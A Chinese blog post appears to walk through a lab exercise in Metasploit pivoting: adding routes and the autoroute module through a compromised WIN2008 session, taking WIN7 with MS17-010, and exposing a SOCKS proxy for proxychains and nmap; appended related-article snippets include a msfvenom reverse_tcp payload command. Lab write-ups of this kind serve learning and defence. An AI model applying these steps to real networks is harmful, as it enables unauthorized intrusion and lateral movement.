内网渗透-msf及socks代理转发

最新推荐文章于 2024-08-22 10:09:59 发布
最新推荐文章于 2024-08-22 10:09:59 发布
阅读量9.6k 收藏 39
点赞数 15
分类专栏: # 内网渗透 文章标签: msf socks 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014029795/article/details/117375754
版权

0x00 学习环境

在这里插入图片描述

拓扑如上,现在已经拥有了WIN2008meterpreter权限
在这里插入图片描述
希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。

0x01 路由转发1

先在meterpreter中使用route进行查看WIN2008所在的网段信息
在这里插入图片描述
通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 11是挂起的session编号。
在这里插入图片描述
可以看到已经有路由了,用ms17-010win7也可以成功拿到shell
在这里插入图片描述

0x02 路由转发2

使用post/multi/manage/autoroute模块,在msf6以前就是在meterpreter中使用run autoroute -s指令,两者是等同的。

同样的,先使用background挂到后台。这里为了实验效果,先将上一个实验的路由给删除
在这里插入图片描述
然后加载post/multi/manage/autoroute模块,调用session就可以了
在这里插入图片描述
和之前的效果是一样的。

0x03 总结

这个环境是模拟现网中的一种情况,即WIN2008WIN7都可以访问互联网的,但是互联网只能访问WIN2008的情况,经过尝试,如果WIN7不可以访问互联网时,反弹shell肯定会失败,改换成bind_tcppayload后还是可以成功的。
在这里插入图片描述

0x04 你以为这就完了吗?

这里其实有一个大问题,通过这种方式做代理转发,只能是msf使用,其它的应用无法使用,如果其它应用想用呢?当然也有办法,就是再加一个sock代理即可。

msf6中代理模块改为了auxiliary/server/socks_proxy
在这里插入图片描述
可以选择sock的版本,以及定义监听的接口IP和端口
在这里插入图片描述

运行后,会自动挂入后台
在这里插入图片描述
接着编辑本地的proxychains程序配置文件vim /etc/proxychains.conf
在这里插入图片描述
接着浏览器设置代理
在这里插入图片描述
此时就可以通过浏览器直接访问内网了。
在这里插入图片描述
如果此时希望使用msf或者nmap的话,就必须使用proxychains来进行启动程序,并且一定要注意proxychains只对tcp流量有效,所以udpicmp都是不能代理转发的。

另外,这里nmap我自己测试有点坑,必须使用nmap -sT -Pn才可以,跳过ping扫描的同时一定要用建立连接的方式进行探测,还是有点奇怪的。
在这里插入图片描述
OVER!

baynk
关注
专栏目录
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2445
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1985
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
MSF配置代理转发
j13373960206的博客
07-13 841
现在可以将主机1 设置成代理转发模式,也就是ms将数据包发送给主机1 ,主机1 再将数据包发送给主机2 ,以此来完成控制主机2。1、getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管 道。2、getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。此时在msf和主机2之间有主机1 ,而且主机1 已经被我们所控制(成功上线)2、修改配置文件,指定使用kail中的配置的代理服务。在被入侵的主机上,执行后门后,此时会发现上线成功。
内网安全:Socks 代理 -- 本地代理 技术._socks代理
最新发布
baimao__Ch的博客
08-22 718
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
msf 代理转发
03-11 5471
简介 本篇文章主要是关于msf框架的实战内容,主要是关于代理,中继的内容的 网络拓扑图如下 根据网络拓扑,目标公司公网上暴露着一台服务器,然后内部还有两台服务器,但是不能出网,也无法直接访问到,防火墙对于进站规则限制严格,仅允许访问80,443端口,对于A服务器的出站不做限制。 以下的实验是基于这种前提:我们已经拿下了服务器的权限,并且成功反弹shell的情况下,将实验msf在以下三种跨网段的使用 添加路由 端口转发 反向代理 添加路由 ,适用于初始的跨网段代理 端口转发,适用于访问特定目标的代理
MSF横向拓展(流量代理,端口代理转发)--详细教程
qq_41245301的博客
01-19 998
命令进行路由跟踪发现走了我的真实机的vmnet8网卡,我们在kail中把vmnet8的网卡的网关删除掉(需要连外网时记得添加回来route add default gw 192.168.138.2),再ping时发现已经网络不可达了,实验环境就可以了。原理:因为之前环境已经实现了通过msf可以访问到内网主机的功能,我们现在通过server/socks_proxy模块实现让指定的流量走msf创建的路由到达内网主机,实现代理。可以实现代理,我们可以发现当我们使用代理时是不能连接到内网主机的,当我们加上。
SSH反向代理转发至内网msf
weixin_30835649的博客
08-03 737
前言 买了个便宜的 vps , 在上面装 msf 也装不上,于是想着把端口映射到内网来。 正文 拓扑如下: 首先在内网主机 B ssh -fCNR 7281:localhost:5000 root@C_IP 执行完后会把 B:5000 反弹到 C_IP:7281.此时 C 监听 127.0.0.1:7281 然后然后在 公网中转服务器 C ssh -fCNL *:5586:localhost:...
msf+proxychains组合搭建socks5隧道 | 内网穿透
ULGANOY的博客
08-19 552
socks5隧道 | 内网穿透技术学习
53-2 内网代理4 - frp搭建socks一级代理
weixin_43263566的博客
07-09 248
FRP是一款专注于内网穿透的高性能反向代理应用,支持多种协议如TCP、UDP、HTTP、HTTPS等,能够安全、便捷地将内网服务通过具有公网IP的中转节点暴露到公网。在网络渗透和远程访问管理中,FRP是一个常用的代理工具之一。此外,FRP还支持搭建SOCKS5代理应用。功能特点多协议支持:支持TCP、UDP、HTTP、HTTPS等多种网络协议。安全性:提供安全的数据传输和访问控制。跨平台:提供了适用于Windows和Linux系统的两个版本。简易部署:通过简单的配置即可实现内网服务的公网访问。
内网渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6381
0x01前言 本文讲述由公司的一次内网靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双网卡),通过双网卡ms17-010到域成员机器上,最后打域控。 这里因为篇幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7629
代理面试常问一.概述代理的本质是socks协议
内网代理转发
qq_38989921的博客
02-27 289
隔离内网目标:192.168.179.200 该目标无法直接访问,要通过web服务器进行访问 web机器(双网卡):外网IP:192.168.43.100;内网IP:192.168.179.100 首先访问外网IP,上传webshell拿到daemon权限 冰蝎连接: 接下来需要提权,利用Linux的suid提权 能通过suid提权的程序: Nmap Vim find Bash More Less Nano cp 通过find / -perm -u=s -type f 2>/dev/null搜索 发
PHP用socket模拟post表单
weixin_30416497的博客
12-24 133
post的本质就是发送给目的程序一个标志为post的协议串如下: POST /目的程序 HTTP/1.1 Accept: */* Referer: http://www.phpiask.com Accept-Language: zh-cn,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded User-Agent: ...
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 812
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
内网渗透Socks代理协议&主机不出网&CS-MSF控制上线
2301_76227305的博客
05-22 1785
那么什么是代理呢,我们本地可以直接访问windows server2008,无法直接访问win7。但是windows server2008可以直接访问win7,因为他们有同一网段的ip嘛。那么我们可以拿到windows server2008控制权,然后让它转发我们本地的流量到win7,那么server2008就充当了我们访问win7的代理。例如,有个包裹要从广州到深圳,但是包裹自己到达不了目的地,那么我们可以让快递公司代替我们把包裹送到深圳,此时快递公司就充当我们的代理
msf添加路由及socks代理进行内网穿透
2301_76227305的博客
02-21 2244
前面发过一篇cs开启socks代理实现内网穿透的,今天写一下msf添加socks代理实现内网访问以上的操作都是基于我们已经熟悉了其内网的环境,但在现实中往往要进行大量的内网信息收集工作。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2342
MSF初体验(二)——Meterpreter命令
MSF内网渗透实战
hackzkaq的博客
05-17 3955
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
内网渗透测试 MSF搭建socks代理
m0_63028223的博客
10-14 2771
通过msf设置代理渗透内网不出网主机
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值